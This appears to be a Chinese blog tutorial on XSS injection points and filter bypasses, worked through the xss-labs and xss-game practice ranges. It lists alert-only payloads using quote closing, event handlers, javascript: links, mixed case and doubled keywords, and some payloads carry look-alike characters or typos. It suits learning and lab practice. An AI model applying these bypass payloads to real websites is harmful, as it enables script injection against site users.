xss漏洞总结【插入位置】

本文详细介绍了XSS跨站脚本攻击的各种可能位置,包括URL、搜索框和留言板,并列举了相应的绕过方法,如换标签、闭合引号、大小写绕过等。同时,通过实例展示了在不同场景下如何构造XSS payload,例如使用事件触发和JavaScript编码。此外,还提到了XSS-labs和xss-game.appspot.com两个靶场,用于实践和提升XSS防御能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

明天再更新:

使用靶场:xss-labs、https://xss-game.appspot.com

XSS可能出现的地方:

  • url的地址栏:
  • 搜索框:
  • 留言板:

绕过方法:

  • 换标签<a href >
  • 闭合双引号、
  • 大小写绕过、
  • 双写关键字、
  • 构造事件(onclick).

靶场:xss-labs

位置一:URL里

在这里插入图片描述

位置二:搜索框中

html属性中作为值;绕过方法:闭合。

"><script>alert(1)</script>

在这里插入图片描述

位置三:搜索框中

如下图:'<script>alert(1)</script>' 其中单引号被替换成双引号,特殊字符也被实体编码了。

特殊字符被过滤,但不对单引号转义,因此利用单引号闭合构造事件

'οnclick='alert(1)''

或者

'οnfοcus=alert('xss') >//

在这里插入图片描述

位置四:搜索框
尖括号被过滤了,所有考虑事件触发,用双引号闭合value属性。

"οnclick='alert(1)'"  或者:"οnfοcus='alert(1)'"

"οnfοcus=javascript:alert('xss') " // 或者"οnclick=javascript:alert('xss') " //

在这里插入图片描述

在这里插入图片描述

位置五:
特殊字符被替代,换标签继续:

"><a href=jiavascript:alert('1')>2</a>//
">:闭合前面标签。
<a href=javascript:alert('1')>2</a>:点击数字2,跳转到href执行弹窗命令。
//:注释后面的“>。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

位置六:搜索框
关键字过滤了:href、script、on
大小写绕过:"oNclick='alert(1)'" 使用双引号进行闭合。

"oNclick='alert(1)'"
或者"Onclick=javascript:alert('xss') " //
或者 "> <a HrEf=javascript:alert('xss') > xss</a> //

位置七:搜索框
关键字被删除,尝试双写

"onοnclick=javascript:alert('xss') " //

在这里插入图片描述

靶场:https://xss-game.appspot.com/

第一关:地址栏中:<script>alert(1)</script>

也可以使用反斜号绕过,遇到“()”被屏蔽时可以使用这种方式。${String}这是ES6新增的模板字符串方法新特性。

第二关:发布帖子:
<a href=javascript:alert(1)>xss</a>

第三关:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值